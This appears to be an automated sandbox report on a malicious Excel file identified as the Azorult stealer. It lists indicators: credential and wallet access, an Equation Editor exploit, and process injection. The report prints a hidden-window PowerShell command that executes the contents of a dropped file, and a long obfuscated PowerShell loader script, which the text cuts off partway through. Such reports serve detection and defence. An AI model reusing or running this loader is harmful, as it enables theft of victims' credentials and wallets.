Analysis
-
max time kernel
120s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231023-en -
resource tags
arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system -
submitted
11-12-2023 15:23
Static task
static1
Behavioral task
behavioral1
Sample
1132.xls
Resource
win7-20231023-en
Behavioral task
behavioral2
Sample
1132.xls
Resource
win10v2004-20231130-en
General
-
Target
1132.xls
-
Size
1.1MB
-
MD5
15a4cb54baeca1e5a1a8fea8483ca1af
-
SHA1
6f24d08fd83320e303d0cb3b48a2ba029b783d38
-
SHA256
1cec950b5a2818af2a8419bac0f55467a9334824f86a060a1b4f555dfa4dfd1b
-
SHA512
4d46852dad6e3294f2dbe65b10546104e711fd70a46466d895e19c0ebd8be0575796fe958ccc536ffe8abec2749f320160ed96115f1f1abdecfec1482cdde445
-
SSDEEP
24576:Aw6/4ZyEAXZSqQw6/VZyuAXZSHN8Ow7cIP/BHzxatjU258wdy:b6/qKEG6//IEat7jPNlUjUm8K
Malware Config
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Blocklisted process makes network request 1 IoCs
Processes:
EQNEDT32.EXEflow pid process 3 2652 EQNEDT32.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
wlanext.exepid process 3044 wlanext.exe -
Loads dropped DLL 17 IoCs
Processes:
EQNEDT32.EXEwab.exepid process 2652 EQNEDT32.EXE 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe 1708 wab.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 1708 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2836 powershell.exe 1708 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2836 set thread context of 1708 2836 powershell.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wab.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wab.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wab.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 2708 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Processes:
EXCEL.EXEdescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Toolbar EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE Key created \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" EXCEL.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 EXCEL.EXE -
Modifies registry class 64 IoCs
Processes:
EXCEL.EXEdescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\ = "&Open" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\ = "&Print" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" EXCEL.EXE Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit EXCEL.EXE Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" EXCEL.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell EXCEL.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2576 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 2536 powershell.exe 2836 powershell.exe 1708 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2836 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2536 powershell.exe Token: SeDebugPrivilege 2836 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
Processes:
EXCEL.EXEpid process 2576 EXCEL.EXE 2576 EXCEL.EXE 2576 EXCEL.EXE 2576 EXCEL.EXE 2576 EXCEL.EXE -
Suspicious use of WriteProcessMemory 26 IoCs
Processes:
EQNEDT32.EXEwlanext.exepowershell.exepowershell.exewab.execmd.exedescription pid process target process PID 2652 wrote to memory of 3044 2652 EQNEDT32.EXE wlanext.exe PID 2652 wrote to memory of 3044 2652 EQNEDT32.EXE wlanext.exe PID 2652 wrote to memory of 3044 2652 EQNEDT32.EXE wlanext.exe PID 2652 wrote to memory of 3044 2652 EQNEDT32.EXE wlanext.exe PID 3044 wrote to memory of 2536 3044 wlanext.exe powershell.exe PID 3044 wrote to memory of 2536 3044 wlanext.exe powershell.exe PID 3044 wrote to memory of 2536 3044 wlanext.exe powershell.exe PID 3044 wrote to memory of 2536 3044 wlanext.exe powershell.exe PID 2536 wrote to memory of 2836 2536 powershell.exe powershell.exe PID 2536 wrote to memory of 2836 2536 powershell.exe powershell.exe PID 2536 wrote to memory of 2836 2536 powershell.exe powershell.exe PID 2536 wrote to memory of 2836 2536 powershell.exe powershell.exe PID 2836 wrote to memory of 1708 2836 powershell.exe wab.exe PID 2836 wrote to memory of 1708 2836 powershell.exe wab.exe PID 2836 wrote to memory of 1708 2836 powershell.exe wab.exe PID 2836 wrote to memory of 1708 2836 powershell.exe wab.exe PID 2836 wrote to memory of 1708 2836 powershell.exe wab.exe PID 2836 wrote to memory of 1708 2836 powershell.exe wab.exe PID 1708 wrote to memory of 1572 1708 wab.exe cmd.exe PID 1708 wrote to memory of 1572 1708 wab.exe cmd.exe PID 1708 wrote to memory of 1572 1708 wab.exe cmd.exe PID 1708 wrote to memory of 1572 1708 wab.exe cmd.exe PID 1572 wrote to memory of 2708 1572 cmd.exe timeout.exe PID 1572 wrote to memory of 2708 1572 cmd.exe timeout.exe PID 1572 wrote to memory of 2708 1572 cmd.exe timeout.exe PID 1572 wrote to memory of 2708 1572 cmd.exe timeout.exe -
outlook_office_path 1 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
outlook_win_path 1 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3425689832-2386927309-2650718742-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\1132.xls1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2576
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Users\Admin\AppData\Roaming\wlanext.exe"C:\Users\Admin\AppData\Roaming\wlanext.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden $d = Get-Content 'C:\Users\Admin\AppData\Local\Temp\afdelingsarkitekters\Eksamenstilmeldingen\Kloesse\Okkultister153\Cleidohyoid\Aminoacetophenone.Kur' ; powershell.exe ''$d''3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Sabaoth Parcellization Kphjestes #>$Hooray = """Li;AfFHouBunSkcAvt DiTio SnFe BiJ LaRomKobHee CaOuuSexDi0Lk4Ge Un{Wi Kl Bi Un SypEnakerheaPym R(Ju[StS LtStrCoiInnBlg D]Mi`$FrSOvt NaFovSteNonAteBrsOu)pa;ph En St in Co`$fjT Gr Ri SaCenOvg DuHelPaa RrFoi UsDa Af=Or SqNReeCowUn-amOPabSojReeUdcRetBr StbTayretSeeAn[nu]Bu Ov(Re`$MiS BtMiaSav UeApnYeeScsAa.PrLEnePenBegfatAchBd M/ka Sv2De)Sp;Re T E Dr EmFHeoberBr(Rd`$ MD LeUdg Yr TadedSlaVonDedNe= S0Ud;Ul Pr`$LoDMaeamgSurMaaTrd LaLanKodIn In- Cl ct N F`$ FSsutjuaInvSteHanBeeYosAn.FiLSkeLenTugIttEmhWa;Fo Ga`$ SD EeWagMar OaNad TaFon AdFa+Pa=Pa2Sn) R{ H En Cu S ph Ne Un Ca Tv`$LuTOdrAtiTaa KnCagHiuDilInaCarKaiDaspa[Tr`$ CDGyeUdgTerFiaBedSlaPenUtd J/Pr2sc] S ba= M Su[deciboRenDivLueTrrQutAf]sn:Ga:SeTwao SBShyBitRaeIm(dr`$RaS atreaNevnoeUdn HeAnsSu.ImSStuafb SsIntPhrSki UnCog O(Ma`$VaDLyeSpgDirTaaNidObaSknUndOp,Un Re2Re)At,Be Ru1Va6Pl)El;Ph Fi Ge`$naTRorCoiRiaLinKagAnuSolOraPrrFoiHvsMa[Co`$UnDSee UgDerCoaModCoaBenTzdCh/ T2Li]Po Li=be DeO Us HsIniRieFo5Ga U`$PaTSirDyi Ka Vn Fg KuAmlFeaThrKei SsMi[Da`$ IDPaefogNorLaaGidTeaEmnStdHi/de2Ju]Te Co1Ve2So6Ly;By Pa Ur Fo Bo} T oc[adSSjtHorStiEsnIngPh]Aa[TrSVayPrsEvtSleUnmTh.deT AeCixHetNu.GaEFonHucmooEqdBii DnvigFl]Ri:In:BaA ASReCOvIAtIFr.EnGHye StSkStrt KrCoiOpn tgNo( L`$ ITOurLki IaFln Sg cuLylvoaInrIniTysta)ca;Ge}Ci`$TrVBedSee u0an= SJ MaNimSibDrechaNiuCaxPo0In4 A ch' S2 MDAf0St7Bo0SyDSm0SaASl1DiB D1Sc3Fa5Kb0 E1AfAFo1no2An1Pr2Pe' T;Un`$NeVNodAue H1Ti= PJNiaStm LbFieSka BuKax T0al4Ch Si'Do3So3kr1un7St1HeD I0EqCBr1se1Ad0OrDNo1Br1Ta1 T8Cr0maAIa5An0Pi2Co9 U1Pr7Un1Am0No4SpDAn4 CCuf5Sc0Fi2VeBFo1ph0 D0DaDVe1inFma1Se8Yo1EtBDo3Fr0An1NoFSy0PoAen1Ma7In0Na8Su1FoBNo3Ka3 G1OvBAf0NiA J1Kn6Gu1Ga1La1 SA R0 ID P'In;Re`$WaV TdOpeAk2Di=OvJ NaOpmOpbNeeFra FuOnxPe0pr4 U Me'Sk3Pe9 S1UnBNe0 TARa2haECa0ecC D1Co1Tr1CoD M3AuFFi1FrAHj1DcA G0UpC b1 TBMo0DoDFl0 SD I' R; S`$UnVthdFieWh3ke= PJAmaComPibFlePua BuTox F0ea4Go us'Tr2TaDHy0Sp7Pl0CoDTr0AnAZo1 SB t1co3Cu5Ge0la2saCOp0DeBPe1Ud0De0ArADi1 L7Ma1Ry3Di1 IB M5Ar0 T3Sc7gi1Ph0 A0UpA S1UnB T0ReC B1 C1 V0SkEIn2 ADaf1SaBSu0 DCPa0Eu8Sk1im7Tu1chDUd1PrBen0 SDPl5Re0Te3Si6St1 MFRu1Co0In1SlA M1Vi2Ek1BeB H2 OC N1 FBLo1 T8Pr'Bl;ko`$HaVDed BeOv4Nu=FrJ SaBamUnb PeSlaPauTexHy0Ur4 G Qu'st0KrDCu0 FATi0AcC V1 F7Sk1Tr0Tr1Ya9Sy'Ek;De`$UnVTidReeZi5Un= NJWhaSpmAubFoe SaPauPoxRe0Ka4 D Ov'Fe3Be9be1HoBKo0SyANo3Co3Kb1 u1Ar1KaAEn0 JBBr1Co2Ge1TiBBe3Hj6To1PeFSu1is0ca1IlAUh1Go2Bl1AlB P'Se;ud`$ EVAsdGae G6Pr=HoJTea SmTrbLee RaKauLixYp0Ip4Ba Ce'Ho2SuCCh2FoAIm2vaDOp0SlE P1BiBRe1OlDCi1Br7Ma1DeFPr1En2Sa3Ec0Da1 MFDs1bj3Pr1TaBSt5Is2 U5 TETu3As6Hy1Ra7Pl1PlAta1GrBMa3DrCSj0do7Be2diDKi1 o7Ti1 W9Za5Ba2tv5JoE D2KlELo0 LBsa1AfC N1Me2 D1 S7Te1AdDHu're;Sa`$FuVOpdLie G7Ou=BiJIsaUnmJobFaeKraChuBoxRe0Ri4Sh Fu'An2PrC C0 PBci1 P0Vi0ScAFo1Un7es1Ho3Qu1YtBOp5Bo2Dr5UdE L3Ud3St1FoF A1Va0Pe1 IFSd1Br9Mo1AsBAg1PrA B' R; P`$ SVUddIneSu8Ju= SJnoaAfmWeb AeIlacauXaxUn0Ac4Co Le'Sy2PlCSa1RuBSp1Bl8Pl1 A2 R1ToB r1 RD I0YdAAn1udB S1 FA L3BlASt1 MBPe1Lu2Ra1AsBGr1 O9 R1PhFNo0MaAVi1 OB O'Fl; D`$StVHadUneGe9de=PaJStaComPlbBrePsaBeuFoxIo0Be4So Si' M3Ch7Be1Dv0Eu3My3de1KaBRe1 C3St1Un1Ga0KvCFi0Re7No3Sk3Ho1Ob1 R1 MAAf0PeB S1 L2 G1RaBDi'Pr;Pl`$DiAPrfUds PkMor PiApvStnefiRanScgtasDumStaskaMedCoeSps v0Mi= MJFoaUnm ubPeeCea su Ax P0Co4To Ry'De3Ma3 U0Ap7Ga3caAOo1ViBDi1Pu2In1FlBPa1Sk9Ru1ArFFe0HaAaf1 FB G2maAaf0Ls7Co0PyE H1StBPh'Fo;Se`$ TAOpf Bssvk ArJeiBlvBanDeiSpnMigEnsSemToa faundSyeRdsSe1th=CrJ TaAdmHobGueLua KuEfxSu0An4Fr Sl'Ep3SnDGa1St2 F1GaFSp0KyDAu0SmDUd5El2Di5PiEPr2FrEBr0 PBPe1 TCDe1Tr2Sk1 S7Af1 DDCr5Kn2Mi5BlENi2 MDLi1JvBAt1HvFTe1Ti2 